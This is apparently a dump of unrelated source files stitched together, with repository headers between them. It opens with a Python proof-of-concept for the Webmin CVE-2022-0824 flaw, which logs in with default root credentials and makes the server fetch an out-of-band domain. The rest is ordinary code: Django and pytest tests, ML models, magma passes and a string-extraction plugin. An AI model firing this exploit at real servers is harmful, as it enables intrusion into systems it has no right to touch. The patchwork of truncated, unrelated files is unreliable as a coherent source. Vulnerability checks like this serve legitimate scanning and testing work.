"cwe-id": "CWE-863. CWE-284"
},
"metadata":{
"vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-0824/vultarget"
},
"tags": ["webmin", "privilege", "auth"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
username = "root"
password = "password"
try:
url = format_url(url)
oob_domain,flag = gen_oob_domain()
path = """/session_login.cgi"""
method = "POST"
data = '''user={username}&pass={password}'''.format(username=username, password=password)
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'redirect=1;testing=1;PHPSESSID=;'
}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/extensions/file-manager/http_download.cgi?module=filemin"""
method = "POST"
data = """link=http://{oob_domain}&username=&password=&path=/xxx""".format(oob_domain=oob_domain)
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Referer': '{}/filemin/?xnavigation=1'.format(url)
}
resp1 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
    return url
|
docs/manual/inputs/python_control_port.py | cpick/mongrel2 | 299 | 11188121 | import zmq
from mongrel2 import tnetstrings
from pprint import pprint
CTX = zmq.Context()
addr = "ipc://run/control"
ctl = CTX.socket(zmq.REQ)
print "CONNECTING"
ctl.connect(addr)
while True:
cmd = raw_input("> ")
# will only work with simple commands that have no arguments
ctl.send(tnetstrings.dump([cmd, {}]))
resp = ctl.recv()
pprint(tnetstrings.parse(resp))
ctl.close()
|
th_pocket/tests.py | Leopere/django-th | 1,069 | 11188130 | <reponame>Leopere/django-th
# coding: utf-8
import arrow
import datetime
from django.conf import settings
from django_th.tests.test_main import MainTest
from pocket import Pocket
from th_pocket.forms import PocketProviderForm, PocketConsumerForm
from th_pocket.models import Pocket as PocketModel
from th_pocket.my_pocket import ServicePocket
from unittest.mock import patch
class PocketTest(MainTest):
"""
PocketTest Model
"""
def create_pocket(self):
trigger = self.create_triggerservice(consumer_name='ServicePocket')
tag = 'test'
title = 'foobar'
url = 'http://foobar.com/somewhere/other/the/rainbow'
tweet_id = ''
status = True
return PocketModel.objects.create(tag=tag, url=url, title=title,
tweet_id=tweet_id, trigger=trigger,
status=status)
class PocketModelAndFormTest(PocketTest):
"""
PocketModelTest
"""
def test_pocket(self):
p = self.create_pocket()
self.assertTrue(isinstance(p, PocketModel))
self.assertEqual(p.show(), "My Pocket {}".format(p.url))
self.assertEqual(p.__str__(), "{}".format(p.url))
def test_get_config_th(self):
"""
does this settings exists ?
"""
self.assertTrue(settings.TH_POCKET_KEY)
def test_get_services_list(self):
th_service = ('th_pocket.my_pocket.ServicePocket',)
for service in th_service:
self.assertIn(service, settings.TH_SERVICES)
"""
Form
"""
# provider
def test_valid_provider_form(self):
"""
test if that form is a valid provider one
"""
p = self.create_pocket()
data = {'tag': p.tag}
form = PocketProviderForm(data=data)
self.assertTrue(form.is_valid())
form = PocketProviderForm(data={})
self.assertTrue(form.is_valid())
# consumer
def test_valid_consumer_form(self):
"""
test if that form is a valid consumer one
"""
p = self.create_pocket()
data = {'tag': p.tag}
form = PocketConsumerForm(data=data)
self.assertTrue(form.is_valid())
form = PocketConsumerForm(data={})
self.assertTrue(form.is_valid())
class ServicePocketTest(PocketTest):
"""
ServicePocketTest
"""
def setUp(self):
super(ServicePocketTest, self).setUp()
self.pocket = self.create_pocket()
self.date_triggered = datetime.datetime(2013, 6, 10, 00, 00)
self.data = {'link': 'http://foo.bar/some/thing/else/what/else',
'title': 'what else'}
self.token = '<PASSWORD>'
self.trigger_id = 1
self.service = ServicePocket(self.token)
@patch.object(Pocket, 'get')
def test_read_data(self, mock1):
kwargs = {'date_triggered': self.date_triggered,
'link': 'http://foo.bar/some/thing/else/what/else',
'title': 'what else'}
since = arrow.get(self.date_triggered).timestamp
sp = ServicePocket(self.token)
sp.read_data(**kwargs)
mock1.assert_called_once_with(since=since, state='unread')
@patch.object(Pocket, 'add')
def test_save_data(self, mock1):
self.assertTrue(self.token)
self.assertTrue(isinstance(self.trigger_id, int))
self.assertIn('link', self.data)
self.assertIn('title', self.data)
self.assertIsNotNone(self.data['link'])
self.assertNotEqual(self.data['title'], '')
se = ServicePocket(self.token)
se.save_data(self.trigger_id, **self.data)
mock1.assert_called_once_with(url=self.data.get('link'),
title=self.data.get('title'),
tags=self.pocket.tag)
def test_save_data_no_url(self):
self.assertTrue(self.token)
self.assertTrue(isinstance(self.trigger_id, int))
self.assertIn('link', self.data)
self.assertIn('title', self.data)
self.assertIsNotNone(self.data['link'])
self.assertNotEqual(self.data['title'], '')
self.data['link'] = ''
se = ServicePocket(self.token)
status = se.save_data(self.trigger_id, **{'title': 'what else'})
self.assertFalse(status)
def test_get_config_th(self):
"""
does this settings exists ?
"""
self.assertTrue(settings.TH_POCKET_KEY)
self.assertIn('consumer_key', settings.TH_POCKET_KEY)
def test_auth(self):
pass
def test_callback(self):
pass
|
configs/repvgg/deploy/repvgg-A2_deploy_4xb64-coslr-120e_in1k.py | YuxinZou/mmclassification | 1,190 | 11188161 | _base_ = '../repvgg-A2_4xb64-coslr-120e_in1k.py'
model = dict(backbone=dict(deploy=True))
|
tests/unit/analysis/test_grid.py | CartoDB/cartoframes | 236 | 11188172 | # """Unit tests for cartoframes.analysis.grid"""
import os
import pytest
import numpy as np
from pandas import read_csv
from geopandas import GeoDataFrame
from shapely.geometry import box, shape
from cartoframes.analysis.grid import QuadGrid
from cartoframes.utils.geom_utils import set_geometry
from geopandas.testing import assert_geodataframe_equal
# DATA FRAME SRC BBOX
pol_1 = box(1, 1, 2, 2)
pol_2 = box(3, 3, 4, 4)
GDF_BOX = GeoDataFrame({'id': [1, 2], 'geom': [pol_1, pol_2]}, columns=['id', 'geom'], geometry='geom')
pol_geojson = {
'type': 'Polygon',
'coordinates': [
[
[
-5.899658203125,
38.436379603
],
[
-6.690673828125,
37.67512527892127
],
[
-6.15234375,
37.43997405227057
],
[
-5.8447265625,
37.70120736474139
],
[
-6.13037109375,
37.82280243352756
],
[
-5.877685546874999,
38.02213147353745
],
[
-6.009521484375,
38.12591462924157
],
[
-5.5810546875,
38.1777509666256
],
[
-5.899658203125,
38.436379603
]
]
]
}
GDF_IRREGULAR = GeoDataFrame({'id': [1], 'geom': [shape(pol_geojson)]}, columns=['id', 'geom'], geometry='geom')
BASE_FOLDER = os.path.dirname(os.path.abspath(__file__))
class TestGrid(object):
def _load_test_gdf(self, fname):
fname = os.path.join(BASE_FOLDER, fname)
df = read_csv(fname, dtype={'id': np.int64, 'geom': object, 'quadkey': object})
gdf = GeoDataFrame(df, crs='epsg:4326')
set_geometry(gdf, 'geom', inplace=True)
return gdf
@pytest.mark.skip()
def test_quadgrid_polyfill_box(self, mocker):
"""cartoframes.analysis.grid.QuadGrid.polyfill"""
gdf = QuadGrid().polyfill(GDF_BOX, 12)
assert isinstance(gdf, GeoDataFrame)
        # Check both dataframes are equal
gdf_test = self._load_test_gdf('grid_quadkey_bbox.csv')
assert_geodataframe_equal(gdf, gdf_test, check_less_precise=True)
@pytest.mark.skip()
def test_quadgrid_polyfill_pol(self, mocker):
"""cartoframes.analysis.grid.QuadGrid.polyfill"""
gdf = QuadGrid().polyfill(GDF_IRREGULAR, 12)
assert isinstance(gdf, GeoDataFrame)
        # Check both dataframes are equal
gdf_test = self._load_test_gdf('grid_quadkey_pol.csv')
assert_geodataframe_equal(gdf, gdf_test, check_less_precise=True)
|
test.py | fxia22/kdnet.pytorch | 116 | 11188198 | from datasets import PartDataset
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import torch.optim as optim
from kdtree import make_cKDTree
import sys
num_points = 2048
class KDNet(nn.Module):
def __init__(self, k = 16):
super(KDNet, self).__init__()
self.conv1 = nn.Conv1d(3,8 * 3,1,1)
self.conv2 = nn.Conv1d(8,32 * 3,1,1)
self.conv3 = nn.Conv1d(32,64 * 3,1,1)
self.conv4 = nn.Conv1d(64,64 * 3,1,1)
self.conv5 = nn.Conv1d(64,64 * 3,1,1)
self.conv6 = nn.Conv1d(64,128 * 3,1,1)
self.conv7 = nn.Conv1d(128,256 * 3,1,1)
self.conv8 = nn.Conv1d(256,512 * 3,1,1)
self.conv9 = nn.Conv1d(512,512 * 3,1,1)
self.conv10 = nn.Conv1d(512,512 * 3,1,1)
self.conv11 = nn.Conv1d(512,1024 * 3,1,1)
self.fc = nn.Linear(1024, k)
def forward(self, x, c):
def kdconv(x, dim, featdim, sel, conv):
batchsize = x.size(0)
# print(batchsize)
x = F.relu(conv(x))
x = x.view(-1, featdim, 3, dim)
x = x.view(-1, featdim, 3 * dim)
sel = Variable(sel + (torch.arange(0, dim) * 3).long())
if x.is_cuda:
sel = sel.cuda()
x = torch.index_select(x, dim=2, index=sel)
x = x.view(-1, featdim, dim / 2, 2)
x = torch.squeeze(torch.max(x, dim=-1, keepdim=True)[0], 3)
return x
x1 = kdconv(x, 2048, 8, c[-1], self.conv1)
x2 = kdconv(x1, 1024, 32, c[-2], self.conv2)
x3 = kdconv(x2, 512, 64, c[-3], self.conv3)
x4 = kdconv(x3, 256, 64, c[-4], self.conv4)
x5 = kdconv(x4, 128, 64, c[-5], self.conv5)
x6 = kdconv(x5, 64, 128, c[-6], self.conv6)
x7 = kdconv(x6, 32, 256, c[-7], self.conv7)
x8 = kdconv(x7, 16, 512, c[-8], self.conv8)
x9 = kdconv(x8, 8, 512, c[-9], self.conv9)
x10 = kdconv(x9, 4, 512, c[-10], self.conv10)
x11 = kdconv(x10, 2, 1024, c[-11], self.conv11)
x11 = x11.view(-1,1024)
out = F.log_softmax(self.fc(x11))
return out
def split_ps(point_set):
#print point_set.size()
num_points = point_set.size()[0]/2
diff = point_set.max(dim=0)[0] - point_set.min(dim=0)[0]
dim = torch.max(diff, dim = 1)[1][0,0]
cut = torch.median(point_set[:,dim])[0][0]
left_idx = torch.squeeze(torch.nonzero(point_set[:,dim] > cut))
right_idx = torch.squeeze(torch.nonzero(point_set[:,dim] < cut))
middle_idx = torch.squeeze(torch.nonzero(point_set[:,dim] == cut))
if torch.numel(left_idx) < num_points:
left_idx = torch.cat([left_idx, middle_idx[0:1].repeat(num_points - torch.numel(left_idx))], 0)
if torch.numel(right_idx) < num_points:
right_idx = torch.cat([right_idx, middle_idx[0:1].repeat(num_points - torch.numel(right_idx))], 0)
left_ps = torch.index_select(point_set, dim = 0, index = left_idx)
right_ps = torch.index_select(point_set, dim = 0, index = right_idx)
return left_ps, right_ps, dim
def split_ps_reuse(point_set, level, pos, tree, cutdim):
sz = point_set.size()
num_points = np.array(sz)[0]/2
max_value = point_set.max(dim=0)[0]
min_value = -(-point_set).max(dim=0)[0]
diff = max_value - min_value
dim = torch.max(diff, dim = 1)[1][0,0]
cut = torch.median(point_set[:,dim])[0][0]
left_idx = torch.squeeze(torch.nonzero(point_set[:,dim] > cut))
right_idx = torch.squeeze(torch.nonzero(point_set[:,dim] < cut))
middle_idx = torch.squeeze(torch.nonzero(point_set[:,dim] == cut))
if torch.numel(left_idx) < num_points:
left_idx = torch.cat([left_idx, middle_idx[0:1].repeat(num_points - torch.numel(left_idx))], 0)
if torch.numel(right_idx) < num_points:
right_idx = torch.cat([right_idx, middle_idx[0:1].repeat(num_points - torch.numel(right_idx))], 0)
left_ps = torch.index_select(point_set, dim = 0, index = left_idx)
right_ps = torch.index_select(point_set, dim = 0, index = right_idx)
tree[level+1][pos * 2] = left_ps
tree[level+1][pos * 2 + 1] = right_ps
cutdim[level][pos * 2] = dim
cutdim[level][pos * 2 + 1] = dim
return
d = PartDataset(root = 'shapenetcore_partanno_segmentation_benchmark_v0', classification = True, train = False)
l = len(d)
print(len(d.classes), l)
levels = (np.log(num_points)/np.log(2)).astype(int)
net = KDNet().cuda()
#optimizer = optim.SGD(net.parameters(), lr=0.01, momentum=0.9)
model_name = sys.argv[1]
net.load_state_dict(torch.load(model_name))
net.eval()
corrects = []
for j in range(len(d)):
point_set, class_label = d[j]
target = Variable(class_label).cuda()
if target != 0:
pass
point_set = point_set[:num_points]
if point_set.size(0) < num_points:
point_set = torch.cat([point_set, point_set[0:num_points - point_set.size(0)]], 0)
cutdim, tree = make_cKDTree(point_set.numpy(), depth=levels)
cutdim_v = [(torch.from_numpy(np.array(item).astype(np.int64))) for item in cutdim]
points = torch.FloatTensor(tree[-1])
points_v = Variable(torch.unsqueeze(torch.squeeze(points), 0)).transpose(2, 1).cuda()
pred = net(points_v, cutdim_v)
pred_choice = pred.data.max(1)[1]
correct = pred_choice.eq(target.data).cpu().sum()
corrects.append(correct)
print("%d/%d , %f" %(j, len(d), float(sum(corrects))/ float(len(corrects))))
print(float(sum(corrects))/ float(len(d)))
|
tests/cgd_test.py | SachinKumar105/Implicit-Competitive-Regularization | 107 | 11188199 | <reponame>SachinKumar105/Implicit-Competitive-Regularization
from optims.cgd_utils import conjugate_gradient, Hvp_vec
import unittest
import torch
import torch.nn as nn
import torch.autograd as autograd
from optims import BCGD, LCGD
from optims.testOptim import testLCGD, ICR, testBCGD
from tensorboardX import SummaryWriter
device = torch.device('cuda:0') if torch.cuda.is_available() else 'cpu'
class NetD(nn.Module):
def __init__(self):
super(NetD, self).__init__()
self.net = nn.Linear(2, 1)
self.weight_init()
def forward(self, x):
return self.net(x)
def weight_init(self):
self.net.weight.data = torch.Tensor([[1.0, 2.0]])
self.net.bias.data = torch.Tensor([-1.0])
class NetG(nn.Module):
def __init__(self):
super(NetG, self).__init__()
self.net = nn.Linear(1, 2)
self.weight_init()
def forward(self, x):
return self.net(x)
def weight_init(self):
self.net.weight.data = torch.Tensor([[3.0], [-1.0]])
self.net.bias.data = torch.Tensor([-4.0, 3.0])
def train():
D = NetD().to(device)
G = NetG().to(device)
print('===discriminator===')
print(D.net.weight.data)
print(D.net.bias.data)
print('===generator===')
print(G.net.weight.data)
print(G.net.bias.data)
z = torch.tensor([2.0], device=device)
real_x = torch.tensor([[3.0, 4.0]], device=device)
loss = D(G(z)) - D(real_x)
grad_g = autograd.grad(loss, list(G.parameters()), create_graph=True, retain_graph=True)
grad_d = autograd.grad(loss, list(D.parameters()), create_graph=True, retain_graph=True)
g_param = torch.cat([p.contiguous().view(-1) for p in list(G.parameters())])
d_param = torch.cat([p.contiguous().view(-1) for p in list(D.parameters())])
grad_ggt = torch.tensor([2 * d_param[0].data, 2 * d_param[1].data,
d_param[0].data, d_param[1].data], device=device)
grad_dgt = torch.tensor([2 * g_param[0] - 3.0, 2 * g_param[1] - 4.0, 0.0])
grad_g_vec = torch.cat([g.contiguous().view(-1) for g in grad_g])
grad_d_vec = torch.cat([g.contiguous().view(-1) for g in grad_d])
print(grad_g_vec - grad_ggt)
print(grad_d_vec - grad_dgt)
# print(grad_g_vec)
# print(grad_d_vec)
grad_g_vec_d = grad_g_vec.clone().detach()
grad_d_vec_d = grad_d_vec.clone().detach()
hvp_g_vec = Hvp_vec(grad_d_vec, list(G.parameters()), grad_d_vec_d, retain_graph=True)
hvp_d_vec = Hvp_vec(grad_g_vec, list(D.parameters()), grad_g_vec_d, retain_graph=True)
if __name__ == '__main__':
optim_type = 'BCGD'
lr = 0.1
epoch_num = 50
# device = torch.device('cuda:0') if torch.cuda.is_available() else 'cpu'
device = 'cpu'
D = NetD().to(device)
G = NetG().to(device)
writer = SummaryWriter(log_dir='logs/test6/%s-real' % optim_type)
if optim_type == 'ICR':
optimizer = ICR(max_params=G.parameters(), min_params=D.parameters(),
lr=lr, alpha=1.0, device=device)
elif optim_type == 'testBCGD':
optimizer = testBCGD(max_params=G.parameters(), min_params=D.parameters(),
lr_max=lr, lr_min=lr, device=device)
elif optim_type == 'BCGD':
optimizer = BCGD(max_params=G.parameters(), min_params=D.parameters(),
lr_max=lr, lr_min=lr, device=device, solve_x=True)
elif optim_type == 'LCGD':
optimizer = LCGD(max_params=G.parameters(), min_params=D.parameters(),
lr_max=lr, lr_min=lr, device=device)
else:
optimizer = testLCGD(max_params=G.parameters(), min_params=D.parameters(),
lr_max=lr, lr_min=lr, device=device)
for e in range(epoch_num):
z = torch.tensor([2.0], device=device)
real_x = torch.tensor([[3.0, 4.0]], device=device)
loss = D(G(z)) - D(real_x)
optimizer.zero_grad()
optimizer.step(loss)
# if e == 1:
# torch.save({'D': D.state_dict(),
# 'G': G.state_dict()}, 'net.pth')
writer.add_scalar('Generator/Weight0', G.net.weight.data[0].item(), global_step=e)
writer.add_scalar('Generator/Weight1', G.net.weight.data[1].item(), global_step=e)
writer.add_scalar('Generator/Bias0', G.net.bias.data[0].item(), global_step=e)
writer.add_scalar('Generator/Bias1', G.net.bias.data[1].item(), global_step=e)
writer.add_scalar('Discriminator/Weight0', D.net.weight.data[0][0].item(), global_step=e)
writer.add_scalar('Discriminator/Weight1', D.net.weight.data[0][1].item(), global_step=e)
writer.add_scalar('Discriminator/Bias0', D.net.bias.data[0].item(), global_step=e)
writer.close()
|
tests/epyccel/modules/call_user_defined_funcs.py | dina-fouad/pyccel | 206 | 11188201 | # pylint: disable=missing-function-docstring, missing-module-docstring/
# This module test call user defined functions
# through nested functions
from pyccel.decorators import types
def do_nothing():
x = 0
x *= 0
@types('real')
def not_change(s):
s *= s
@types('real', 'real')
def my_div(a, b):
return a / b
@types('real', 'real')
def my_mult(a, b):
return a * b
def my_pi():
return 3.141592653589793
@types('real')
def my_cub(r):
return r * r * r
@types('real')
def circle_volume(radius):
do_nothing()
volume = my_mult(my_mult(my_div(3. , 4.), my_pi()), my_cub(radius))
not_change(volume)
return volume
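# Editor's sketch (not in the original test module): when interpreted as plain
# Python (i.e. without compiling through epyccel), the functions above can be
# exercised directly.
if __name__ == '__main__':
    # circle_volume computes (3/4) * pi * r**3 as written above.
    print(circle_volume(1.0))   # ~2.3562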
|
google/datalab/bigquery/_query_stats.py | freyrsae/pydatalab | 198 | 11188230 | <gh_stars>100-1000
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations under
# the License.
"""Implements representation of BigQuery query job dry run results."""
from __future__ import absolute_import
from __future__ import unicode_literals
from builtins import object
class QueryStats(object):
"""A wrapper for statistics returned by a dry run query. Useful so we can get an HTML
representation in a notebook.
"""
def __init__(self, total_bytes, is_cached):
self.total_bytes = float(total_bytes)
self.is_cached = is_cached
def _repr_html_(self):
self.total_bytes = QueryStats._size_formatter(self.total_bytes)
return """
<p>Dry run information: %s to process, results %s</p>
""" % (self.total_bytes, "cached" if self.is_cached else "not cached")
@staticmethod
def _size_formatter(byte_num, suf='B'):
for mag in ['', 'K', 'M', 'G', 'T']:
if byte_num < 1000.0:
if suf == 'B': # Don't do fractional bytes
return "%5d%s%s" % (int(byte_num), mag, suf)
return "%3.1f%s%s" % (byte_num, mag, suf)
byte_num /= 1000.0
return "%.1f%s%s".format(byte_num, 'P', suf)
|
src/postprocessing/clean_list_with_wordnet.py | paperplanet/SegPhrase | 275 | 11188231 | <gh_stars>100-1000
from nltk.corpus import wordnet as wn
from nltk.corpus.reader import NOUN
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-input", help="input path for concepts file")
parser.add_argument("-output", help="output path for noise file")
args = parser.parse_args()
poor_results = set()
results = list()
with open(args.input, 'r') as input:
for line in input:
results.append(line)
concept = line.split(',')[0]
words = concept.split('_')
word = ''
if len(words) > 1:
synsets = wn.synsets(concept)
if len(synsets) != 0:
noun_synsets = wn.synsets(concept, NOUN)
if len(noun_synsets) == 0:
poor_results.add(concept + ',0.0000000000\n')
continue
else:
continue
word = words[-1]
else:
word = concept
synsets = wn.synsets(word)
if len(synsets) == 0:
pass
else:
noun_synsets = wn.synsets(word, NOUN)
if len(noun_synsets) == 0:
poor_results.add(concept + ',0.0000000000\n')
with open(args.output, 'w') as output:
for line in results:
if line not in poor_results:
output.write(line)
for line in poor_results:
output.write(line)
|
Lib/test/test_classdecorators.py | jimmyyu2004/jython | 332 | 11188233 | <gh_stars>100-1000
# This test is temporary until we can import test_decorators from CPython 3.x
# The reason for not doing that already is that in Python 3.x the name of a
# function is stored in func.__name__, in 2.x it's func.func_name
import unittest
from test import support
class TestClassDecorators(unittest.TestCase):
def test_simple(self):
def plain(x):
x.extra = 'Hello'
return x
@plain
class C(object): pass
self.assertEqual(C.extra, 'Hello')
def test_double(self):
def ten(x):
x.extra = 10
return x
def add_five(x):
x.extra += 5
return x
@add_five
@ten
class C(object): pass
self.assertEqual(C.extra, 15)
def test_order(self):
def applied_first(x):
x.extra = 'first'
return x
def applied_second(x):
x.extra = 'second'
return x
@applied_second
@applied_first
class C(object): pass
self.assertEqual(C.extra, 'second')
def test_main():
support.run_unittest(TestClassDecorators)
if __name__ == '__main__':
test_main()
|
python/iog/eval.py | Suveksha/labelflow | 164 | 11188239 | import os.path
from torch.utils.data import DataLoader
from evaluation.eval import eval_one_result
import dataloaders.pascal as pascal
exp_root_dir = "./"
method_names = []
method_names.append("run_0")
if __name__ == "__main__":
# Dataloader
dataset = pascal.VOCSegmentation(transform=None, retname=True)
dataloader = DataLoader(dataset, batch_size=1, shuffle=False, num_workers=0)
# Iterate through all the different methods
for method in method_names:
for ii in [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]:
results_folder = os.path.join(exp_root_dir, method, "Results")
filename = os.path.join(
exp_root_dir, "eval_results", method.replace("/", "-") + ".txt"
)
if not os.path.exists(os.path.join(exp_root_dir, "eval_results")):
os.makedirs(os.path.join(exp_root_dir, "eval_results"))
jaccards = eval_one_result(dataloader, results_folder, mask_thres=ii)
val = jaccards["all_jaccards"].mean()
# Show mean and store result
print(ii)
print(
"Result for {:<80}: {}".format(method, str.format("{0:.4f}", 100 * val))
)
with open(filename, "w") as f:
f.write(str(val))
|
magma/passes/passes.py | leonardt/magma | 167 | 11188240 | <filename>magma/passes/passes.py
from abc import ABC, abstractmethod
from magma.is_definition import isdefinition
from magma.linking import get_all_linked_modules, has_any_linked_modules
from magma.passes.tsort import tsort
__all__ = ['Pass', 'InstancePass', 'DefinitionPass', 'InstanceGraphPass',
'pass_lambda', 'instance_graph', 'dependencies']
class Pass(ABC):
"""Abstract base class for all passes"""
def __init__(self, main):
self.main = main
def run(self):
self.done()
return self
def done(self):
pass
class InstancePass(Pass):
def __init__(self, main):
super().__init__(main)
self.instances = []
def _run(self, defn, path):
for inst in defn.instances:
inst_defn = type(inst)
inst_path = path + (inst, )
self.instances.append(inst_path)
if callable(self):
self(inst_path)
if isdefinition(inst_defn):
self._run(inst_defn, inst_path)
def run(self):
self._run(self.main, tuple())
self.done()
return self
class CircuitPass(Pass):
"""
Run on all circuits (not just definitions)
"""
def __init__(self, main):
super().__init__(main)
self.circuits = {}
def _run(self, circuit):
if isdefinition(circuit):
for inst in circuit.instances:
self._run(type(inst))
link_targets = get_all_linked_modules(circuit)
for target in link_targets:
self._run(target)
# Call each definition only once.
id_ = id(circuit)
if id_ not in self.circuits:
self.circuits[id_] = circuit
if callable(self):
self(circuit)
def run(self):
self._run(self.main)
self.done()
return self
class DefinitionPass(CircuitPass):
"""
Run only only on circuits with definitions
"""
def _run(self, circuit):
if not isdefinition(circuit) and not has_any_linked_modules(circuit):
return
super()._run(circuit)
class BuildInstanceGraphPass(DefinitionPass):
def __init__(self, main):
super().__init__(main)
self.graph = {}
def __call__(self, defn):
if defn not in self.graph:
self.graph[defn] = []
for inst in defn.instances:
inst_defn = type(inst)
if inst_defn not in self.graph:
self.graph[inst_defn] = []
if inst_defn not in self.graph[defn]:
self.graph[defn].append(inst_defn)
for target in get_all_linked_modules(defn):
if target not in self.graph[defn]:
self.graph[defn].append(target)
def done(self):
graph = []
for vert, edges in self.graph.items():
graph.append((vert, edges))
self.tsortedgraph = tsort(graph)
class InstanceGraphPass(Pass):
def __init__(self, main):
super(InstanceGraphPass, self).__init__(main)
pass_ = BuildInstanceGraphPass(main).run()
self.tsortedgraph = pass_.tsortedgraph
if callable(self):
for vert, edges in self.tsortedgraph:
self(vert, edges)
class EditDefinitionPass(DefinitionPass):
@abstractmethod
def edit(self, circuit):
raise NotImplementedError()
def __call__(self, circuit):
with circuit.open():
self.edit(circuit)
# Auxiliary method to convert a simple pass, into a functional form, such as:
#
# SomePass(ckt).run() <-> some_pass(ckt)
#
def pass_lambda(cls):
def _fn(main, *args, **kwargs):
p = cls(main, *args, **kwargs)
p.run()
return p
return _fn
def instance_graph(ckt):
p = pass_lambda(BuildInstanceGraphPass)(ckt)
return p.tsortedgraph
def dependencies(ckt, include_self=False):
graph = instance_graph(ckt)
deps = [dep for dep, _ in graph]
if include_self:
return deps
return list(filter(lambda dep: dep is not ckt, deps))
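# Editor's sketch (not part of the original module): the intended extension
# point is subclassing one of the passes above. ``MyCircuit`` in the usage
# comment is a placeholder for a real, elaborated magma definition.
class _CountInstancesPass(DefinitionPass):
    """Counts instances across every reachable definition."""
    def __init__(self, main):
        super().__init__(main)
        self.num_instances = 0

    def __call__(self, definition):
        # Invoked once per circuit visited by DefinitionPass._run.
        if isdefinition(definition):
            self.num_instances += len(definition.instances)

count_instances = pass_lambda(_CountInstancesPass)
# Usage: print(count_instances(MyCircuit).num_instances)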
|
src/PlugIns/PE/StringPlug.py | codexgigassys/codex-backend | 161 | 11188266 | <filename>src/PlugIns/PE/StringPlug.py
# Copyright (C) 2016 <NAME>.
# This file is part of CodexGigas - https://github.com/codexgigassys/
# See the file 'LICENSE' for copying permission.
from PlugIns.PlugIn import PlugIn
from Modules.MetaDataModule import *
from Modules.PEFileModule import PEFileModule
import validators
import re
class StringPlug(PlugIn):
def __init__(self, sample=None):
PlugIn.__init__(self, sample)
def getPath(self):
return "particular_header.strings"
def getName(self):
return "strings"
def getVersion(self):
return 3
def process(self):
ret = {}
data = ""
pelib = self._getLibrary(PEFileModule().getName())
if(pelib is None):
data = self.sample.getBinary()
else:
for section in pelib.sections:
data = data + section.get_data()
regexp = '[A-Za-z0-9/\-:.,_$&@=?%()[\]<> ]{4,}'
strings = re.findall(regexp, data)
aux = {}
for s in strings:
aux[repr(s).lower()] = True
unique_strings = []
for k in aux:
unique_strings.append(k)
mdc = self._getLibrary(MetaDataModule().getName())
if(mdc is None):
return ret
searchUsed = {}
imports = self.sample.getLastValue("particular_header.imports")
if(imports is not None):
for i in imports:
searchUsed[i["lib"]] = True
for f in i["functions"]:
searchUsed[f] = True
exports = self.sample.getLastValue("particular_header.exports.symbols")
if(exports is not None):
# print("No exports")
for i in exports:
searchUsed[i["name"]] = True
if(hasattr(i, "forwarder_dll") and hasattr(i, "forwarder_function")):
searchUsed[i["forwarder_dll"]] = True
searchUsed[i["forwarder_function"]] = True
version_p = self.sample.getLastValue(
"particular_header.version.string_file_info")
if(version_p is not None):
for k in version_p.keys():
searchUsed["'" + str(version_p[k]) + "'"] = True
raw = []
hidden = []
email = []
url = []
ip_l = []
dll = []
domain = []
interesting = []
registry = []
for s in unique_strings:
# checking if the import is declared or not
# print(s)
# print(searchUsed.get(repr(s).lower()))
# raw_input()
if(searchUsed.get(s) is True):
continue
raw.append(s)
# searching if its an import or not
r = mdc.searchImportByName(s)
if(r is not None):
hidden.append(s)
continue
evaluado = eval(s)
# searching dll
r = mdc.searchDllByName(s)
if(r is not None):
dll.append(s)
continue
# searching for filenames
types = ["exe", "dll", "bat", "sys", "htm", "html", "js", "jar", "jpg",
"png", "vb", "scr", "pif", "chm", "zip", "rar", "cab", "pdf",
"doc", "docx", "ppt", "pptx", "xls", "xlsx", "swf", "gif", "pdb", "cpp"]
salir = False
for pat in types:
if(s.find("." + pat) != -1):
interesting.append(s)
salir = True
break
if salir:
continue
# searching email
if(validators.email(evaluado)):
email.append(s)
continue
# searching url
if(validators.url(evaluado)):
url.append(s)
continue
# searching ips
if(validators.ipv4(evaluado)): # or validators.ipv6(evaluado)):
ip_l.append(s)
continue
# searching registry
if(s.find("HKLM\\") != -1 or s.find("HKCU\\") != -1):
registry.append(s)
continue
# searching domains
if(validators.domain(evaluado)):
domain.append(s)
continue
ret["raw_strings"] = sorted(raw)
if(len(hidden) > 0):
ret["hidden_imports"] = sorted(hidden)
if(len(email) > 0):
ret["emails"] = sorted(email)
if(len(url) > 0):
ret["urls"] = sorted(url)
if(len(ip_l) > 0):
ret["ips"] = sorted(ip_l)
if(len(dll) > 0):
ret["hidden_dll"] = sorted(dll)
if(len(domain) > 0):
ret["domains"] = sorted(domain)
if(len(interesting) > 0):
ret["interesting"] = sorted(interesting)
if(len(registry) > 0):
ret["registry"] = sorted(registry)
return ret
|
tests/problems/test_santa.py | bahia14/Evol | 161 | 11188278 | import math
import pytest
from evol.problems.routing import MagicSanta
@pytest.fixture
def base_problem():
return MagicSanta(city_coordinates=[(0, 1), (1, 0), (1, 1)],
home_coordinate=(0, 0),
gift_weight=[0, 0, 0])
@pytest.fixture
def adv_problem():
return MagicSanta(city_coordinates=[(0, 1), (1, 1), (0, 1)],
home_coordinate=(0, 0),
gift_weight=[5, 1, 1],
sleigh_weight=2)
